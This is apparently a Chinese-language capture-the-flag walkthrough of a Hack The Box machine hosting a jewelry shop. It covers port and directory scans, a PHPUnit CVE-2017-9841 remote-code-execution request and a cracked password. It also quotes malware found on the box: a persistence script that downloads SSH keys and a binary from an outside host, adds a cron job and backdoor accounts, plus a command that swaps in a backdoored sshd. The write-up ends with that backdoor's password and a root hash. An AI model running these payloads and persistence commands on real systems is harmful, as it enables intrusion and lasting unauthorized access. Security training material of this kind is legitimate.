基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV 10.10.11.146
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 14:08 CST
Nmap scan report for 10.10.11.146
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey:
|   3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
|   256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
|_  256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.84 seconds

80

在线商城,store是另一个子域名:

store.djewelry.htb

加hosts后访问:

目录扫描

store注册登录功能现在不能使用,进行目录扫描,发现vendor目录可直接访问:

1
2
3
4
5
6
7
8
9
10
11
12
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://store.djewelry.htb/ -x php,html,txt

/cart.php             (Status: 200) [Size: 4396]
/css                  (Status: 301) [Size: 322] [--> http://store.djewelry.htb/css/] 
/error404.html        (Status: 200) [Size: 3974]
/fonts                (Status: 301) [Size: 324] [--> http://store.djewelry.htb/fonts/]
/images               (Status: 301) [Size: 325] [--> http://store.djewelry.htb/images/]
/index.php            (Status: 200) [Size: 6215]
/js                   (Status: 301) [Size: 321] [--> http://store.djewelry.htb/js/]
/login.php            (Status: 200) [Size: 4129]
/products.php         (Status: 200) [Size: 7447]
/vendor               (Status: 301) [Size: 325] [--> http://store.djewelry.htb/vendor/]

PHPUnit

发现5.6版本的phpunit:

可以搜到相关漏洞:

CVE-2017-9841

利用漏洞执行命令,获取shell:

1
curl -XPOST --data '<?php system("id"); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

/var/backups/info

简单的枚举可以发现一个info文件,下载下来分析:

可以在info中发现一串编码:

hash crack

根据解码出来的内容,可以知道是对非root用户,用户名后加1,使用指定密码hash,破解这个hash,得到复制的普通用户的密码:

1
2
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
ihatehackers

info command

1
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;

user flag

根据/etc/passwd中的结果,有steven和steven1两个普通用户,得到的密码可以登录steven1:

提权信息

/var/mail/steven里有一封邮件提到apache可疑行为:

mod_reader.so

查看apache模块可以发现一个时间与其他模块明显差异比较大的mod_reader.so:

下载下来分析,可以发现hook_post_config中一串base64:

解码可以发现是替换sshd后门:

1
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd

sshd

后门sshd也下载下来分析,其中auth_password函数得到后门密码验证过程:

这里有点问题,我本地ghidra出来的backdoor结果有两部分是错误的,正确的放在后面了

然后就是按顺序排列,hex 进行异或,得到后门密码:

Password

1
2
3
4
5
6
7
8
9
10
0xa5
0xa9f4
0xbcf0b5e3
0xb2d6f4a0fda0b3d6
0xfdb3d6e7
0xf7bbfdc8
0xa4b3a3f3
0xf0e7abd6

@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3

root flag

使用后门密码登录,得到root:

1
root:$6$xxydXHZzlPY4U0lU$qJDDFjfkXQnhUcESjCaoCWjMT9gAPnyCLJ8U5l2KSlOO3hPMUVxAOUZwvcm87Vkz0Vyc./cDsb2nNZT0dYIbv.:19031:0:99999:7:::

参考资料